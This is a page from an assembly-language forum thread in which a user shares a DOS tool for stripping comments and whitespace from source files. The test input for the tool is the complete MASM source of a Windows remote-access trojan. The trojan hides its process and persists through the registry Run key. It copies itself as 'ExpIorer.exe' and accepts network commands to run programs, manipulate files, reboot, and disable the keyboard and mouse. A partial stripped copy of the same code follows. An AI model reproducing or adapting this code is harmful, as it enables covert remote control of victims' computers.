flat assembler
Message board for the users of flat assembler.

Home Search Register
Log in to check your private messages Log in

Index > DOS > Decommenter / Parser issues: where did those NULs come from?

Goto page Previous  1, 2, 3
Author
Thread Post new topic Reply to topic
fasmnewbie



Joined: 01 Mar 2011
Posts: 555
fasmnewbie 24 May 2014, 12:05
Just for fun, I added 3 more features deleting spaces around symbols (,= and +)

Code:
org 100h
include 'dbg16.inc' ;proc16.inc

stdcall fopenr,sourcef,SIZE,buff
stdcall strcpy,pack,buff,SIZE
mov word[limit],SIZE

call del_comments
call del_tabspace
call del_lines

stdcall del_space_after,','
stdcall del_space_around,'+'
stdcall del_space_around,'-'
stdcall del_space_around,'='

stdcall fnew,targetf
stdcall fopenw,targetf,[limit],pack

mov ah,0
int 16h
mov ah,4ch
int 21h

;---------Data----------
SIZE=19183
sourcef db "patch.asm",0
targetf db "newf.txt",0
buff db SIZE dup(?)
pack db SIZE dup(?)
limit dw 0
;-----------------------

;------------------------------
proc del_space_around,info:byte
;------------------------------
        push word[info]
        call del_space_after
        push word[info]
        call del_space_before
        ret
endp

;-----------------------------
proc del_space_after,info:byte
;-----------------------------
        xor si,si
        xor di,di
L15:    mov al,[pack+si]
        mov bl,[pack+si+1]
        cmp al,[info]
            je L35
L25:    mov byte[buff+di],al
        cmp si,[limit]
            je L45
        inc si
        inc di
        jmp L15
L35:    cmp bl,20h
            jne L25
        inc si
        jmp L25
L45:    mov word[limit],di
        stdcall strcpy,pack,buff,[limit]
        ret
endp

;------------------------------
proc del_space_before,info:byte
;------------------------------
        xor si,si
        xor di,di
L14:    mov al,[pack+si]
        cmp al,20h
            je L34
L24:    mov byte[buff+di],al
        cmp si,[limit]
            je L44
        inc si
        inc di
        jmp L14
L34:    mov cl,[info]
        cmp byte[pack+si+1],cl
            jne L24
        inc si  ;skip current character
        jmp L14
L44:    mov word[limit],di
        stdcall strcpy,pack,buff,[limit]
        ret
endp

;--------------------------
del_comments:
;--------------------------
        xor si,si
        xor di,di
next:   mov al,[pack+si]
        cmp al,';'
            je pck
        cmp al,09h
            je tst
ok:     mov byte[buff+di],al
        cmp si,[limit]
            je done
        inc si
        inc di
        jmp next
tst:    cmp byte[pack+si+1],';'
            jne ok
pck:    inc si
        cmp si,[limit]
            je done
        mov al,[pack+si]
        cmp al,0dh
            je ok
        cmp al,0ah
            je ok
        jmp pck
done:   mov word[limit],di
        stdcall strcpy,pack,buff,[limit]
        ret

;--------------------------
del_tabspace:
;--------------------------
        xor si,si
        xor di,di
next4:  mov al,[pack+si]
        cmp al,09h
            je pck4
ok4:    mov byte[buff+di],al
        cmp si,[limit]
            je done4
        inc si
        inc di
        jmp next4
pck4:   inc si
        jmp next4
done4:  mov word[limit],di
        stdcall strcpy,pack,buff,[limit]
        xor si,si
        xor di,di
next5:  mov al,[pack+si]
        cmp al,20h
            je tst5
        cmp al,0ah
            je tst51
ok5:    mov byte[buff+di],al
        cmp si,word[limit]
            je done5
        inc si
        inc di
        jmp next5
tst51:  cmp byte[pack+si+1],20h
            jne ok5
        cmp si,word[limit]
            je done5
        inc si
        mov [pack+si],al
        jmp next5
tst5:   cmp byte[pack+si+1],20h
            jne ok5
pck5:   inc si
        jmp next5
done5:  mov word[limit],di
        stdcall strcpy,pack,buff,[limit]
        ret


;--------------------------------
del_lines:
;--------------------------------
        xor si,si
        xor di,di
next1:  mov al,[pack+si]
        cmp al,0dh
            je pck1
ok1:    mov byte[buff+di],al
        inc si
        inc di
        cmp si,[limit]
            je quit
        jmp next1
pck1:   cmp [pack+si+2],0dh
            jne ok1
        add si,2
        cmp si,[limit]
            je quit
        jmp next1
quit:   mov [limit],di
        stdcall strcpy,pack,buff,[limit]
        ret

;-------------
proc fnew info
;-------------
        mov ah,3ch
        mov cl,0
        mov dx,[info]
        int 21h
        ret
endp

;-----------------------
proc fopenr info,sz,buff
;-----------------------
        mov dx,[info]
        mov al,0
        mov ah,3dh
        int 21h
        mov bx,ax
        mov cx,[sz]
        mov dx,[buff]
        mov ah,3fh
        int 21h
        mov ah,3eh
        int 21h
        ret
endp

;------------------------
proc fopenw info,sz,buff
;------------------------
        mov dx,[info]
        mov al,2
        mov ah,3dh
        int 21h
        mov bx,ax
        mov cx,[sz]
        mov dx,[buff]
        mov ah,40h
        int 21h
        mov ah,3eh
        int 21h
        ret
endp

;-------------------------
proc strcpy,dest,source,sz
;-------------------------
        mov si,[dest]
        mov di,[source]
        xor bx,bx
go1:    mov al,byte[di+bx]
        mov byte[si+bx],al
        inc bx
        cmp bx,[sz]
            je done1
        jmp go1
done1:  ret
endp
Post 24 May 2014, 12:05
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20518
Location: In your JS exploiting you and your system
revolution 24 May 2014, 12:09
This is a problem:
Code:
SIZE=19183
sourcef db "patch.asm",0
targetf db "newf.txt",0
You can get the two file names from the command line arguments. And the files size can be obtained from the file system.
Post 24 May 2014, 12:09
View user's profile Send private message Visit poster's website Reply with quote
fasmnewbie



Joined: 01 Mar 2011
Posts: 555
fasmnewbie 24 May 2014, 12:12
Test file (patch.asm, 19183 bytes)

Before:
Code:
.386
.model          flat,stdcall
option          casemap:none

include         \masm32\include\winmm.inc
include         \masm32\include\windows.inc
include         \masm32\include\masm32.inc
include         \masm32\include\wsock32.inc
include         \masm32\include\user32.inc
include         \masm32\include\kernel32.inc
include         \masm32\include\advapi32.inc
include         \masm32\include\shell32.inc
includelib      \masm32\lib\shell32.lib
includelib      \masm32\lib\user32.lib
includelib      \masm32\lib\kernel32.lib
includelib      \masm32\lib\wsock32.lib
includelib      \masm32\lib\masm32.lib
includelib      \masm32\lib\advapi32.lib
includelib      \masm32\lib\winmm.lib

WinMain         PROTO :DWORD,:DWORD,:DWORD,:DWORD
SetRegKeysz     PROTO :DWORD,:DWORD,:DWORD,:DWORD
SetRegKeyDW PROTO :DWORD, :DWORD, :DWORD
GetRegKeyDW PROTO :DWORD, :DWORD, :DWORD
send_LB_shit_2_client PROTO :DWORD,:DWORD

;  --------------------------------------------------------------------------------
;  initialized data
;  --------------------------------------------------------------------------------

.DATA
IDC_LB          equ 3000
WM_SOCKET       equ WM_USER + 100
ClassName       db "StupidBlowMyDickClass",0
AppName         db "ExpIorer",0
IconName        db "TDIcon",0
lstBox          db "LISTBOX",0
Port            dd 2027
succ            db "SUCCESSFULL!",0
wsadata         WSADATA             <>
sin             sockaddr_in         <>
StartupInfo         STARTUPINFO         <>
ProcessInfo         PROCESS_INFORMATION <>
szKeyName       db "Software\Microsoft\Windows\CurrentVersion\Run\",0
szKeyName1      db "Software\TrojanSoftware\",0
szStringValue   db "ExpIorer",0
RegistryText    db "ExpIorer.exe"  ,0
szDWValue       db  "YUCKFOU",0
DubWord         dd  12345678H
szBigBuffer     db "                              ",0
dwBBufLength    DWORD   SIZEOF szBigBuffer + 1
kernel32        db "kernel32.dll", 0
func            db "RegisterServiceProcess", 0             
cdopen          db "set CDAudio door open",0
cdclose         db "set CDAudio door closed",0
bkl             db "\",0
wcs             db "*.*",0
opr             db "open",0
crash_str               db "rundll32.exe user,disableoemlayer",0
keyoff_str              db "rundll32.exe keyboard,disable",0
mouseoff_str    db "rundll32.exe mouse,disable",0

;  --------------------------------------------------------------------------------
;  uninitialized data
;  --------------------------------------------------------------------------------

.DATA?
LBPOINT         dd ?
Bufcmd          dd ?
path            db 500 dup (?)
fname           db 256 dup (?)
ThisFile        db 256 dup (?)
SD              db 256 dup (?)
cmd1            db 300 dup (?)
cmd2            db 300 dup (?)
cmd             db ?
c1len           db ?
c2len           db ?
hInstance       dd ?
CommandLine     dd ?
sock            dd ?
client          dd ?
DubWordBack     dd ?
BIGBUFFER       db 10000 dup (?)
FILEN           db 00256 dup (?)
LBCOUNT         dd ?
LBLEN           dd ?

;  --------------------------------------------------------------------------------
;  code sction
;  --------------------------------------------------------------------------------

.CODE
start:      invoke FindWindow,0,addr AppName
            cmp eax,0
            jnz quit            
            invoke GetModuleHandle, ADDR kernel32       ;hide process
                or eax,eax                                              ;thanx to CyborgASM
              jz continue
            invoke GetProcAddress, eax, ADDR func   
            or eax, eax
            jz continue            
            push 1               
            push 0               
            call eax
continue:   
            invoke GetRegKeyDW, ADDR DubWordBack, ADDR szKeyName1, ADDR szDWValue
            mov eax,DubWordBack
.IF         eax != DubWord
            invoke SetRegKeyDW , ADDR DubWord, ADDR szKeyName1, ADDR szDWValue
            cmp eax,ERROR_SUCCESS
            jnz normal
            invoke SetRegKeysz , ADDR RegistryText, ADDR szKeyName,    
            ADDR szStringValue, SIZEOF szStringValue            
            cmp eax,ERROR_SUCCESS
            jnz normal
            invoke GetSystemDirectory,addr SD,sizeof SD
            invoke lstrcat,addr SD,addr bkl
            invoke lstrcat,addr SD,addr RegistryText           
            invoke GetModuleFileName,NULL,addr ThisFile,sizeof ThisFile
            invoke CopyFile,addr ThisFile,addr SD,FALSE
.ENDIF            
normal:     invoke GetModuleHandle, NULL
            mov    hInstance,eax
            invoke GetCommandLine
            mov    CommandLine,eax
            invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
quit:       invoke ExitProcess,eax

;  --------------------------------------------------------------------------------
;  start of the windows procedure
;  --------------------------------------------------------------------------------

WinMain     proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
            LOCAL wc:WNDCLASSEX
            LOCAL msg:MSG
            LOCAL hwnd:HWND            
            mov   wc.cbSize,SIZEOF WNDCLASSEX
            mov   wc.style, CS_HREDRAW or CS_VREDRAW
            mov   wc.lpfnWndProc, OFFSET WndProc
            mov   wc.cbClsExtra,NULL
            mov   wc.cbWndExtra,NULL
            push  hInstance
            pop   wc.hInstance
            mov   wc.hbrBackground,COLOR_WINDOW+1
            mov   wc.lpszMenuName,NULL
            mov   wc.lpszClassName,OFFSET ClassName
            invoke LoadIcon,hInstance,addr IconName
            mov   wc.hIcon,eax
            mov   wc.hIconSm,eax
            invoke LoadCursor,NULL,IDC_ARROW
            mov   wc.hCursor,eax
            invoke RegisterClassEx, addr wc
            INVOKE CreateWindowEx,NULL,ADDR ClassName,ADDR AppName,\
            WS_OVERLAPPEDWINDOW,0,\
            0,300,300,NULL,NULL,\
            hInst,NULL
            mov   hwnd,eax            
            ;     invoke ShowWindow, hwnd,SW_SHOWNORMAL
            ;     invoke UpdateWindow, hwnd       
            invoke WSAStartup,101h,addr wsadata
            invoke socket,AF_INET,SOCK_STREAM,0
            mov sock,eax
            invoke WSAAsyncSelect,sock,hwnd,WM_SOCKET,FD_ACCEPT+FD_READ
            mov sin.sin_family,AF_INET
            invoke htons,Port
            mov sin.sin_port,ax
            mov sin.sin_addr,INADDR_ANY            
            invoke bind, sock,addr sin,sizeof sin
            invoke listen,sock,15

.WHILE TRUE
            invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF  (!eax)
            invoke TranslateMessage, ADDR msg
            invoke DispatchMessage, ADDR msg
.ENDW
            mov eax,msg.wParam
            ret
WinMain     endp

;  --------------------------------------------------------------------------------
;  start of the procedure which is getting all the quene messages
;  --------------------------------------------------------------------------------

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM

;  --------------------------------------------------------------------------------
;  create a (hidden) listbox for file stuff...
;  --------------------------------------------------------------------------------

.IF         uMsg == WM_CREATE
            invoke CreateWindowEx,WS_EX_CLIENTEDGE,ADDR lstBox,0,WS_VSCROLL or \
            WS_VISIBLE or WS_BORDER or WS_CHILD or LBS_HASSTRINGS or LBS_SORT or \
            LBS_NOINTEGRALHEIGHT or LBS_DISABLENOSCROLL,20,20,200,200,hWnd,
            IDC_LB,hInstance,NULL
            invoke SendDlgItemMessage,hWnd,IDC_LB,LB_DIR,DDL_ARCHIVE+DDL_DIRECTORY+ \
            DDL_DRIVES+DDL_HIDDEN+DDL_READONLY+DDL_READWRITE+DDL_SYSTEM,addr wcs

;  --------------------------------------------------------------------------------
;  check if the is window closed...
;  --------------------------------------------------------------------------------

.ELSEIF     uMsg == WM_DESTROY
            invoke closesocket,sock
            invoke WSACleanup
                invoke PostQuitMessage,NULL

;  --------------------------------------------------------------------------------
;  did we get some socket messages?
;  --------------------------------------------------------------------------------

.ELSEIF     uMsg == WM_SOCKET
            mov eax,lParam

;  --------------------------------------------------------------------------------
;  some client tried to connect our server
;  --------------------------------------------------------------------------------

.IF         ax == FD_ACCEPT
            shr ax,16
.IF         ax == NULL            
            invoke accept,sock,0,0           
            mov client,eax           
            invoke GetCurrentDirectory,sizeof path,addr path            
            invoke lstrlen,addr path
.IF         eax != 3            
            invoke lstrcat,addr path,addr bkl
.ENDIF            
            invoke send_LB_shit_2_client,hWnd,client
.ENDIF

;  --------------------------------------------------------------------------------
;  a client wrote stuff on our socket
;  --------------------------------------------------------------------------------

.ELSEIF     ax == FD_READ
            mov ecx,10000                   ;clear the Receive-Buffer
            mov edi,OFFSET BIGBUFFER        ;don't know if its right but...
lll:        mov byte ptr [edi],0            ;better is better! Wink
            inc edi
            loop lll                        
            mov eax,wParam
            mov client,eax
            invoke recv,eax,addr BIGBUFFER,600,0
.IF         eax == SOCKET_ERROR
            invoke recv,eax,addr BIGBUFFER,600,0
.ENDIF
.IF         eax != SOCKET_ERROR
            mov edi,OFFSET BIGBUFFER
            cmp dword ptr [edi],"ELIF"            
            jnz normalcmd
            add edi,4
            invoke lstrcpy,addr path,edi
            push edi            
            invoke SendDlgItemMessage,hWnd,IDC_LB,LB_RESETCONTENT,0,0
            pop edi            
            invoke DlgDirList,hWnd,edi,IDC_LB,NULL,DDL_ARCHIVE+DDL_DIRECTORY+ \
            DDL_DRIVES+DDL_HIDDEN+DDL_READONLY+DDL_READWRITE+DDL_SYSTEM
.IF         eax == NULL
            invoke SendDlgItemMessage,hWnd,IDC_LB,LB_DIR,DDL_ARCHIVE+DDL_DIRECTORY+ \
            DDL_DRIVES+DDL_HIDDEN+DDL_READONLY+DDL_READWRITE+DDL_SYSTEM,addr wcs
            invoke GetCurrentDirectory,sizeof path,addr path            
            invoke lstrlen,addr path
.IF         eax != 3            
            invoke lstrcat,addr path,addr bkl
.ENDIF                        
            invoke lstrcat,addr path,addr bkl            
.ENDIF
            invoke send_LB_shit_2_client,hWnd,client
            jmp filetrans
normalcmd:  invoke send,client,addr succ,sizeof succ,0
            mov edi,OFFSET BIGBUFFER
            mov Bufcmd,edi
            add Bufcmd,3            
            mov al,byte ptr [edi]
            mov cmd,al            
            mov al,byte ptr [edi + 1]   
            inc al
            mov c1len,al
            mov al,byte ptr [edi + 2]
            inc al
            mov c2len,al
            invoke lstrcpyn,addr cmd1,Bufcmd,c1len
            invoke lstrlen,addr cmd1
            add eax,OFFSET cmd1
            mov byte ptr [eax],0
            xor eax,eax
            mov al,c1len
            add Bufcmd,eax
            dec Bufcmd            
            invoke lstrcpyn,addr cmd2,Bufcmd,c2len
            invoke lstrlen,addr cmd2
            add eax,OFFSET cmd2
            mov byte ptr [eax],0
.IF         cmd == 1        ; === shutdown server   === 
            invoke DeleteFile,addr SD
            invoke SendMessage,hWnd,WM_DESTROY,0,0
.ELSEIF     cmd == 2        ; === messagebox        === 
            invoke MessageBox,0,addr cmd2,addr cmd1,MB_OK+MB_ICONHAND
.ELSEIF     cmd == 3        ; === reboot system     === 
            invoke ExitWindowsEx,EWX_FORCE,0
.ELSEIF     cmd == 4        ; === REBOOT            === 
            invoke ExitWindowsEx,EWX_REBOOT,0
.ELSEIF     cmd == 5        ; === clear clipboard   === 
            invoke GetOpenClipboardWindow
            invoke OpenClipboard,eax
            invoke EmptyClipboard
            invoke CloseClipboard
.ELSEIF     cmd == 6        ; === start application === 
            invoke lstrcpy,addr BIGBUFFER,addr cmd1
            invoke lstrlen,addr BIGBUFFER
            add eax,OFFSET BIGBUFFER
            mov word ptr [eax],00020h
            invoke lstrcat,addr BIGBUFFER,addr cmd2   
            invoke CreateProcess, NULL, addr BIGBUFFER, NULL, NULL,
            FALSE, NORMAL_PRIORITY_CLASS, NULL,NULL,
            offset StartupInfo, offset ProcessInfo
.ELSEIF     cmd == 7
            invoke DeleteFile,addr cmd1
            invoke send_LB_shit_2_client,hWnd,client            
.ELSEIF     cmd == 8 ;copy
            invoke CopyFile,addr cmd1,addr cmd2,FALSE
            invoke send_LB_shit_2_client,hWnd,client                       
.ELSEIF     cmd == 9 ;move
            invoke MoveFile,addr cmd1,addr cmd2
            invoke send_LB_shit_2_client,hWnd,client                       
.ELSEIF     cmd == 10
.ELSEIF     cmd == 11
.ELSEIF     cmd == 12        ; === beep              === 
            invoke atodw,addr cmd1
            mov ecx,eax
mbloop:     push ecx
            invoke MessageBeep,0FFFFFFFFh
            pop ecx
            loop mbloop            
.ELSEIF     cmd == 13        ; === close window      === 
            invoke GetForegroundWindow
            invoke SendMessage,eax,WM_CLOSE,0,0
.ELSEIF     cmd == 14        ; === open/close cd    === 
            invoke mciSendString,ADDR cdopen,NULL,0,0 
            invoke mciSendString,ADDR cdclose,NULL,0,0 
.ELSEIF     cmd == 15       ; === minimize window  ===             
            invoke GetForegroundWindow
            push eax
            invoke IsIconic,eax
            cmp eax,0
            jnz nope
            pop eax
            invoke CloseWindow,eax
            nope:            
.ELSEIF     cmd == 16       ; === shell execute  ===             
            invoke ShellExecute,NULL,NULL,addr cmd1,NULL,NULL,SW_SHOWNORMAL            
.ELSEIF     cmd == 17       ; === system crash ===             
            invoke WinExec,addr crash_str,SW_HIDE;
.ELSEIF     cmd == 18       ; === keyboard off ===             
            invoke WinExec,addr keyoff_str,SW_HIDE;            
.ELSEIF     cmd == 19       ; === mouse off ===             
            invoke WinExec,addr mouseoff_str,SW_HIDE;
.ENDIF            
filetrans:
.ENDIF                                         
.ENDIF            
.ELSE
                invoke DefWindowProc,hWnd,uMsg,wParam,lParam            
                ret
.ENDIF
            xor eax,eax
            ret
WndProc     endp

;  --------------------------------------------------------------------------------
;  set a new registry key (thanx to TTom)
;  --------------------------------------------------------------------------------

SetRegKeysz PROC lpszString:DWORD, lpszKeyName:DWORD, lpszValueName:DWORD, dwStringLength
            LOCAL Disp  :DWORD
            LOCAL pKey  :DWORD
            invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE,lpszKeyName, NULL, NULL,
            REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS, NULL,addr pKey, addr Disp
.IF         eax == ERROR_SUCCESS
            invoke RegSetValueEx, pKey, lpszValueName, NULL, REG_SZ, 
            lpszString, dwStringLength 
            invoke RegCloseKey, pKey
.ENDIF
            ret
SetRegKeysz ENDP

;  --------------------------------------------------------------------------------
;  write a simple dd in the registry (tnx2TTom)
;  --------------------------------------------------------------------------------
                
SetRegKeyDW PROC lpdwValue:DWORD, lpszKeyName:DWORD, lpszValueName:DWORD
            LOCAL Disp  :DWORD
            LOCAL pKey  :DWORD
            DW_SIZE     EQU     4
            invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE,lpszKeyName, NULL, NULL, 
            REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS, NULL,addr pKey, addr Disp
.IF         eax == ERROR_SUCCESS
            invoke RegSetValueEx,pKey,lpszValueName,NULL,REG_DWORD_LITTLE_ENDIAN, 
            lpdwValue, DW_SIZE 
            invoke RegCloseKey, pKey
.ENDIF
            ret
SetRegKeyDW ENDP

;  --------------------------------------------------------------------------------
;  reads a simple dd... (thanx to TTom)
;  --------------------------------------------------------------------------------

GetRegKeyDW PROC lpdwValue:DWORD, lpszKeyName:DWORD, lpszValueName:DWORD
            LOCAL Temp  :DWORD
            LOCAL pKey  :DWORD
            LOCAL DWordSize:DWORD
            DW_SIZE EQU 4
            mov DWordSize, DW_SIZE
            invoke RegCreateKeyEx,HKEY_LOCAL_MACHINE,lpszKeyName,NULL,NULL, 
            REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,addr pKey,addr Temp
.IF         eax == ERROR_SUCCESS
            mov eax, REG_DWORD
            mov Temp, eax
            invoke RegQueryValueEx, pKey, lpszValueName,NULL, ADDR Temp, 
            lpdwValue, ADDR DWordSize 
            invoke RegCloseKey, pKey
.ENDIF
            ret
GetRegKeyDW ENDP

;  --------------------------------------------------------------------------------
;  this proc sends file stuff to the client
;  --------------------------------------------------------------------------------

send_LB_shit_2_client PROC mhWnd:DWORD, mclient:DWORD
            invoke SendDlgItemMessage,mhWnd,IDC_LB,LB_GETCOUNT,0,0
            dec eax
            mov LBCOUNT,eax
            mov edi,OFFSET BIGBUFFER
            mov dword ptr [edi  ],"ELIF"
            mov eax,LBCOUNT
            mov dword ptr [edi+5],eax
            invoke lstrlen,addr path
            inc eax                       
            push eax                      
            mov edi,OFFSET BIGBUFFER
            add edi,9    
            invoke lstrcpy,edi,addr path
            pop eax
            add eax,9            
            invoke send,mclient,addr BIGBUFFER,eax,0            
            invoke Sleep,500            
            push OFFSET BIGBUFFER
            pop LBPOINT
            mov LBLEN,0
            mov ecx,10000
            mov edi,OFFSET BIGBUFFER
clearl:     mov byte ptr [edi],0
            inc edi
            loop clearl
lloop:      invoke SendDlgItemMessage,mhWnd,IDC_LB,LB_GETTEXT,LBCOUNT,addr FILEN
            inc eax
            push eax
            add LBLEN,eax
            cmp LBLEN,10000
            jge errorquit
            invoke lstrcpy,LBPOINT,addr FILEN           
            pop eax
            add LBPOINT,eax                  
            dec LBCOUNT
            cmp LBCOUNT,-1
            jnz lloop
errorquit:  invoke send,mclient,addr BIGBUFFER,LBLEN,0
ret
send_LB_shit_2_client ENDP

END         start



After (newf.txt - 10,806 bytes):
Code:
.386
.model flat,stdcall
option casemap:none
include \masm32\include\winmm.inc
include \masm32\include\windows.inc
include \masm32\include\masm32.inc
include \masm32\include\wsock32.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc
include \masm32\include\shell32.inc
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\wsock32.lib
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\winmm.lib
WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
SetRegKeysz PROTO :DWORD,:DWORD,:DWORD,:DWORD
SetRegKeyDW PROTO :DWORD,:DWORD,:DWORD
GetRegKeyDW PROTO :DWORD,:DWORD,:DWORD
send_LB_shit_2_client PROTO :DWORD,:DWORD
.DATA
IDC_LB equ 3000
WM_SOCKET equ WM_USER+100
ClassName db "StupidBlowMyDickClass",0
AppName db "ExpIorer",0
IconName db "TDIcon",0
lstBox db "LISTBOX",0
Port dd 2027
succ db "SUCCESSFULL!",0
wsadata WSADATA <>
sin sockaddr_in <>
StartupInfo STARTUPINFO<>
ProcessInfo PROCESS_INFORMATION<>
szKeyName db "Software\Microsoft\Windows\CurrentVersion\Run\",0
szKeyName1 db "Software\TrojanSoftware\",0
szStringValue db "ExpIorer",0
RegistryText db "ExpIorer.exe" ,0
szDWValue db "YUCKFOU",0
DubWord dd 12345678H
szBigBuffer db " ",0
dwBBufLength DWORD SIZEOF szBigBuffer+1
kernel32 db "kernel32.dll",0
func db "RegisterServiceProcess",0 
cdopen db "set CDAudio door open",0
cdclose db "set CDAudio door closed",0
bkl db "\",0
wcs db "*.*",0
opr db "open",0
crash_strdb "rundll32.exe user,disableoemlayer",0
keyoff_strdb "rundll32.exe keyboard,disable",0
mouseoff_strdb "rundll32.exe mouse,disable",0
.DATA?
LBPOINT dd ?
Bufcmd dd ?
path db 500 dup (?)
fname db 256 dup (?)
ThisFile db 256 dup (?)
SD db 256 dup (?)
cmd1 db 300 dup (?)
cmd2 db 300 dup (?)
cmd db ?
c1len db ?
c2len db ?
hInstance dd ?
CommandLine dd ?
sock dd ?
client dd ?
DubWordBack dd ?
BIGBUFFER db 10000 dup (?)
FILEN db 00256 dup (?)
LBCOUNT dd ?
LBLEN dd ?
.CODE
start: invoke FindWindow,0,addr AppName
cmp eax,0
jnz quit 
invoke GetModuleHandle,ADDR kernel32 
or eax,eax 
jz continue
invoke GetProcAddress,eax,ADDR func 
or eax,eax
jz continue 
push 1 
push 0 
call eax
continue: 
invoke GetRegKeyDW,ADDR DubWordBack,ADDR szKeyName1,ADDR szDWValue
mov eax,DubWordBack
.IF eax !=DubWord
invoke SetRegKeyDW ,ADDR DubWord,ADDR szKeyName1,ADDR szDWValue
cmp eax,ERROR_SUCCESS
jnz normal
invoke SetRegKeysz ,ADDR RegistryText,ADDR szKeyName,
ADDR szStringValue,SIZEOF szStringValue 
cmp eax,ERROR_SUCCESS
jnz normal
invoke GetSystemDirectory,addr SD,sizeof SD
invoke lstrcat,addr SD,addr bkl
invoke lstrcat,addr SD,addr RegistryText 
invoke GetModuleFileName,NULL,addr ThisFile,sizeof ThisFile
invoke CopyFile,addr ThisFile,addr SD,FALSE
.ENDIF 
normal: invoke GetModuleHandle,NULL
mov hInstance,eax
invoke GetCommandLine
mov CommandLine,eax
invoke WinMain,hInstance,NULL,CommandLine,SW_SHOWDEFAULT
quit: invoke ExitProcess,eax
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hwnd:HWND 
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style,CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc,OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInstance
pop wc.hInstance
mov wc.hbrBackground,COLOR_WINDOW+1
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,hInstance,addr IconName
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx,addr wc
INVOKE CreateWindowEx,NULL,ADDR ClassName,ADDR AppName,\
WS_OVERLAPPEDWINDOW,0,\
0,300,300,NULL,NULL,\
hInst,NULL
mov hwnd,eax 
invoke WSAStartup,101h,addr wsadata
invoke socket,AF_INET,SOCK_STREAM,0
mov sock,eax
invoke WSAAsyncSelect,sock,hwnd,WM_SOCKET,FD_ACCEPT+FD_READ
mov sin.sin_family,AF_INET
invoke htons,Port
mov sin.sin_port,ax
mov sin.sin_addr,INADDR_ANY 
invoke bind,sock,addr sin,sizeof sin
invoke listen,sock,15
.WHILE TRUE
invoke GetMessage,ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage,ADDR msg
invoke DispatchMessage,ADDR msg
.ENDW
mov eax,msg.wParam
ret
WinMain endp
WndProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
.IF uMsg==WM_CREATE
invoke CreateWindowEx,WS_EX_CLIENTEDGE,ADDR lstBox,0,WS_VSCROLL or \
WS_VISIBLE or WS_BORDER or WS_CHILD or LBS_HASSTRINGS or LBS_SORT or \
LBS_NOINTEGRALHEIGHT or LBS_DISABLENOSCROLL,20,20,200,200,hWnd,
IDC_LB,hInstance,NULL
invoke SendDlgItemMessage,hWnd,IDC_LB,LB_DIR,DDL_ARCHIVE+DDL_DIRECTORY+\
DDL_DRIVES+DDL_HIDDEN+DDL_READONLY+DDL_READWRITE+DDL_SYSTEM,addr wcs
.ELSEIF uMsg==WM_DESTROY
invoke closesocket,sock
invoke WSACleanup
invoke PostQuitMessage,NULL
.ELSEIF uMsg==WM_SOCKET
mov eax,lParam
.IF ax==FD_ACCEPT
shr ax,16
.IF ax==NULL 
invoke accept,sock,0,0 
mov client,eax 
invoke GetCurrentDirectory,sizeof path,addr path 
invoke lstrlen,addr path
.IF eax !=3 
invoke lstrcat,addr path,addr bkl
.ENDIF 
invoke send_LB_shit_2_client,hWnd,client
.ENDIF
.ELSEIF ax==FD_READ
mov ecx,10000 
mov edi,OFFSET BIGBUFFER 
lll: mov byte ptr [edi],0 
inc edi
loop lll 
mov eax,wParam
mov client,eax
invoke recv,eax,addr BIGBUFFER,600,0
.IF eax==SOCKET_ERROR
invoke recv,eax,addr BIGBUFFER,600,0
.ENDIF
.IF eax !=SOCKET_ERROR
mov edi,OFFSET BIGBUFFER
cmp dword ptr [edi],"ELIF" 
jnz normalcmd
add edi,4
invoke lstrcpy,addr path,edi
push edi 
invoke SendDlgItemMessage,hWnd,IDC_LB,LB_RESETCONTENT,0,0
pop edi 
invoke DlgDirList,hWnd,edi,IDC_LB,NULL,DDL_ARCHIVE+DDL_DIRECTORY+\
DDL_DRIVES+DDL_HIDDEN+DDL_READONLY+DDL_READWRITE+DDL_SYSTEM
.IF eax==NULL
invoke SendDlgItemMessage,hWnd,IDC_LB,LB_DIR,DDL_ARCHIVE+DDL_DIRECTORY+\
DDL_DRIVES+DDL_HIDDEN+DDL_READONLY+DDL_READWRITE+DDL_SYSTEM,addr wcs
invoke GetCurrentDirectory,sizeof path,addr path 
invoke lstrlen,addr path
.IF eax !=3 
invoke lstrcat,addr path,addr bkl
.ENDIF 
invoke lstrcat,addr path,addr bkl 
.ENDIF
invoke send_LB_shit_2_client,hWnd,client
jmp filetrans
normalcmd: invoke send,client,addr succ,sizeof succ,0
mov edi,OFFSET BIGBUFFER
mov Bufcmd,edi
add Bufcmd,3 
mov al,byte ptr [edi]
mov cmd,al 
mov al,byte ptr [edi+1] 
inc al
mov c1len,al
mov al,byte ptr [edi+2]
inc al
mov c2len,al
invoke lstrcpyn,addr cmd1,Bufcmd,c1len
invoke lstrlen,addr cmd1
add eax,OFFSET cmd1
mov byte ptr [eax],0
xor eax,eax
mov al,c1len
add Bufcmd,eax
dec Bufcmd 
invoke lstrcpyn,addr cmd2,Bufcmd,c2len
invoke lstrlen,addr cmd2
add eax,OFFSET cmd2
